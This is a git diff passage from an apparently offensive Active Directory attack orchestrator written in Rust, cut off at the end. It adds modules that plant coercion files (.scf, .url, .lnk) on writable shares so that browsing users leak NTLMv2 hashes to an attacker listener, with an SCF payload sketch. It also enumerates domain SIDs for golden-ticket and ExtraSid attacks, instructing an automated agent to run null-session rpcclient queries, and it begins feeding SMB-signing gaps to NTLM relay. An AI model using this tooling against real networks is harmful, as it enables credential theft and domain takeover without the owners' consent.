if is_child_of(&dom, dc_domain) {
// Find Administrator NTLM hash from the dominated child domain
if let Some(hash) = state.hashes.iter().find(|h| {
diff --git a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs
index 4d8759ec..f1ba4861 100644
--- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs
+++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs
@@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials(
.unwrap_or("")
.to_string();
- // Find credential for the source user
- let credential = state
- .credentials
- .iter()
- .find(|c| {
- c.username.to_lowercase() == source_user.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned();
-
- // Also check for NTLM hash as fallback
+ // Find credential for the source user. The source user's
+ // own domain may differ from the vuln's target `domain`
+ // (cross-forest ACL edges like charlie@contoso →
+ // ivy@fabrikam), so we cannot domain-restrict the
+ // lookup against the target.
+ let credential = state.find_source_credential(&source_user, &domain);
let hash = if credential.is_none() {
- state
- .hashes
- .iter()
- .find(|h| {
- h.username.to_lowercase() == source_user.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- && (domain.is_empty()
- || h.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned()
+ state.find_source_hash(&source_user, &domain)
} else {
None
};
diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs
new file mode 100644
index 00000000..be68f281
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/share_coercion.rs
@@ -0,0 +1,515 @@
+//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable
+//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx.
+//!
+//! When a user browses to a share containing one of these files, Windows
+//! automatically connects back to the attacker-controlled listener, leaking the
+//! user's NTLMv2 hash. This is a passive credential harvesting technique.
+//!
+//! Requires: writable shares discovered by share_enum, a listener IP for the
+//! UNC path in the coercion file, and Responder running on the listener.
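+//!
+//! A minimal sketch (illustrative only, not this module's code) of the kind
+//! of `.scf` payload a drop writes. The `IconFile` UNC path points at the
+//! listener, so Explorer's icon fetch leaks the browsing user's NTLMv2 hash;
+//! the share and file names below are placeholders:
+//!
+//! ```ignore
+//! fn scf_payload(listener: &str) -> String {
+//!     // Command=2 plus a UNC IconFile is the classic SCF coercion trick.
+//!     format!("[Shell]\r\nCommand=2\r\nIconFile=\\\\{listener}\\s\\i.ico\r\n")
+//! }
+//! ```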
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect share coercion work items from current state.
+///
+/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime. Returns at most 3 items
+/// per call to avoid flooding the dispatcher.
+fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec<ShareCoercionWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => return Vec::new(),
+ };
+
+ state
+ .shares
+ .iter()
+ .filter(|s| {
+ let perms = s.permissions.to_uppercase();
+ perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE")
+ })
+ .filter(|s| {
+ // Skip default admin/system shares
+ let name_upper = s.name.to_uppercase();
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ )
+ })
+ .filter(|s| {
+ let dedup_key = format!("{}:{}", s.host, s.name);
+ !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key)
+ })
+ .map(|s| ShareCoercionWork {
+ host: s.host.clone(),
+ share_name: s.name.clone(),
+ listener: listener.to_string(),
+ credential: cred.clone(),
+ })
+ .take(3) // limit per cycle to avoid flooding
+ .collect()
+}
+
+/// Monitors for writable shares and dispatches coercion file drops.
+/// Interval: 45s.
+pub async fn auto_share_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("share_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue, // need listener for UNC path in coercion files
+ };
+
+        let work: Vec<ShareCoercionWork> = {
+ let state = dispatcher.state.read().await;
+ collect_share_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "share_coercion",
+ "target_ip": item.host,
+ "share_name": item.share_name,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("share_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host,
+ share = %item.share_name,
+ "Share coercion file drop dispatched"
+ );
+
+ let dedup_key = format!("{}:{}", item.host, item.share_name);
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(
+ host = %item.host,
+ share = %item.share_name,
+ "Share coercion task deferred by throttler"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ host = %item.host,
+ share = %item.share_name,
+ "Failed to dispatch share coercion"
+ );
+ }
+ }
+ }
+ }
+}
+
+struct ShareCoercionWork {
+ host: String,
+ share_name: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::{Credential, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_share(host: &str, name: &str, permissions: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: permissions.into(),
+ comment: String::new(),
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("{}:{}", "192.168.58.22", "Users");
+ assert_eq!(key, "192.168.58.22:Users");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares");
+ }
+
+ #[test]
+ fn admin_shares_filtered() {
+ let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"];
+ for name in &admin_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should be filtered"
+ );
+ }
+ }
+
+ #[test]
+ fn non_admin_shares_pass() {
+ let user_shares = ["Users", "Public", "Data", "shared"];
+ for name in &user_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should pass through"
+ );
+ }
+ }
+
+ #[test]
+ fn writable_permission_matching() {
+ let writable = ["WRITE", "READ/WRITE", "rw WRITE access"];
+ for p in &writable {
+ let perms = p.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(is_writable, "{p} should be writable");
+ }
+ }
+
+ #[test]
+ fn readonly_permission_rejected() {
+ let readonly = ["READ", "NONE", "DENIED"];
+ for p in &readonly {
+ let perms = p.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(!is_writable, "{p} should NOT be writable");
+ }
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "share_coercion",
+ "target_ip": "192.168.58.22",
+ "share_name": "Users",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "share_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["share_name"], "Users");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn admin_share_filtering_lowercase_variations() {
+ let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"];
+ for name in &lower_admin_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} (lowercase) should be filtered after uppercasing"
+ );
+ }
+ }
+
+ #[test]
+ fn writable_permission_with_change_keyword() {
+ let perm = "CHANGE";
+ let perms = perm.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(!is_writable, "CHANGE alone should not match WRITE logic");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = ShareCoercionWork {
+ host: "192.168.58.22".into(),
+ share_name: "Data".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.host, "192.168.58.22");
+ assert_eq!(work.share_name, "Data");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ assert_eq!(work.credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn per_cycle_limit_of_three() {
+        let shares: Vec<String> = (0..10).map(|i| format!("Share{i}")).collect();
+ let limited: Vec<&String> = shares.iter().take(3).collect();
+ assert_eq!(limited.len(), 3);
+ assert_eq!(*limited[0], "Share0");
+ assert_eq!(*limited[2], "Share2");
+ }
+
+ #[test]
+ fn empty_share_name_handling() {
+ let name = "";
+ let name_upper = name.to_uppercase();
+ assert!(
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "Empty share name should pass admin filter"
+ );
+ }
+
+ #[test]
+ fn case_insensitive_admin_share_check() {
+ let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"];
+ for name in &mixed_case {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should be filtered regardless of case"
+ );
+ }
+ }
+
+ // --- collect_share_coercion_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_shares_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_writable_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host, "192.168.58.22");
+ assert_eq!(work[0].share_name, "Users");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_readonly_share_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "READ"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_admin_shares_filtered() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "ADMIN$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "C$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "IPC$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "SYSVOL", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "NETLOGON", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into());
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_limits_to_three_per_cycle() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ for i in 0..5 {
+ state
+ .shares
+ .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE"));
+ }
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 3);
+ }
+
+ #[test]
+ fn collect_read_write_permission_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_name, "Data");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ }
+ let state = shared.read().await;
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host, "192.168.58.22");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs b/ares-cli/src/orchestrator/automation/sid_enumeration.rs
new file mode 100644
index 00000000..4cd11565
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs
@@ -0,0 +1,426 @@
+//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings.
+//!
+//! Queries each discovered DC via LDAP to resolve the domain SID, then maps
+//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.)
+//! to confirm account names. This is useful when the RID-500 account has
+//! been renamed (i.e., is no longer "Administrator").
+//!
+//! Also discovers the domain SID needed for golden ticket forging and
+//! ExtraSid attacks.
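+//!
+//! A minimal sketch of how a well-known RID composes with a resolved domain
+//! SID (illustrative; the actual resolution happens in the worker):
+//!
+//! ```ignore
+//! fn rid_to_sid(domain_sid: &str, rid: u32) -> String {
+//!     format!("{domain_sid}-{rid}")
+//! }
+//! // rid_to_sid("S-1-5-21-1004336348-1177238915-682003330", 500) yields the
+//! // RID-500 built-in admin's SID, whatever the account has been renamed to.
+//! ```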
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SID enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_sid_enum_work(state: &StateInner) -> Vec<SidEnumWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip if we already have the SID for this domain
+ if state.domain_sids.contains_key(domain) {
+ continue;
+ }
+
+ let dedup_key = format!("sid_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(SidEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerate domain SIDs and well-known accounts.
+/// Interval: 45s.
+pub async fn auto_sid_enumeration(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("sid_enumeration") {
+ continue;
+ }
+
+        let work: Vec<SidEnumWork> = {
+ let state = dispatcher.state.read().await;
+ collect_sid_enum_work(&state)
+ };
+
+ for item in work {
+ // Cross-forest authenticated RPC/LDAP from the source forest's
+ // credential typically returns ACCESS_DENIED — but `rpcclient
+ // -U "" -N -c lsaquery` over a null session usually succeeds
+ // against DCs that allow anonymous LSA queries (most legacy
+ // configurations). The agent loop won't try the null-session
+ // path on its own when handed a credential, so we explicitly
+ // instruct it to fall through. The result-processor's
+ // `extract_lsaquery_domain_sid` regex captures the resulting
+ // `Domain Name: / Domain Sid:` block and caches it against the
+ // domain, which unblocks `forge_inter_realm_and_dump`.
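+            // Illustrative output shape the parser is expected to match
+            // (formatting per rpcclient's lsaquery; the SID is a placeholder):
+            //   Domain Name: CONTOSO
+            //   Domain Sid: S-1-5-21-1004336348-1177238915-682003330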
+ let cred_is_cross_forest = !item
+ .credential
+ .domain
+ .to_lowercase()
+ .ends_with(&item.domain.to_lowercase())
+ && !item
+ .domain
+ .to_lowercase()
+ .ends_with(&item.credential.domain.to_lowercase())
+ && item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let instructions = if cred_is_cross_forest {
+ Some(format!(
+ "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \
+ The provided credential is from a different forest and authenticated \
+ RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \
+ Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \
+ session — no credential needed) to capture the `Domain Name:` and \
+ `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \
+ credential as a secondary attempt for RID-500 mapping. Report both \
+ outputs verbatim via task_complete tool_outputs so the parser can \
+ extract the SID.",
+ dom = item.domain,
+ dc = item.dc_ip,
+ ))
+ } else {
+ None
+ };
+
+ let mut payload = json!({
+ "technique": "sid_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+ if let Some(text) = instructions {
+ payload["instructions"] = json!(text);
+ }
+
+ let priority = dispatcher.effective_priority("sid_enumeration");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "SID enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "SID enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct SidEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("sid_enum:{}", "contoso.local");
+ assert_eq!(key, "sid_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "sid_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "sid_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = SidEnumWork {
+ dedup_key: "sid_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "sid_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("sid_enum:{}", "contoso.local");
+ let key2 = format!("sid_enum:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_domain_with_known_sid() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_sids
+ .insert("contoso.local".into(), "S-1-5-21-1234".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "sid_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs
new file mode 100644
index 00000000..909f41f0
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smb_signing.rs
@@ -0,0 +1,279 @@
+//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo.
+//!
+//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but
+//! does NOT create VulnerabilityInfo objects for hosts with signing disabled.
+//! This module scans `state.hosts` for non-DC hosts (signing:False is the default
+//! for member servers) and publishes `smb_signing_disabled` vulns, which the
+//! `ntlm_relay` module consumes to dispatch relay attacks.
+//!
+//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns.
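+//!
+//! A minimal sketch of the banner check this bridging relies on (the exact
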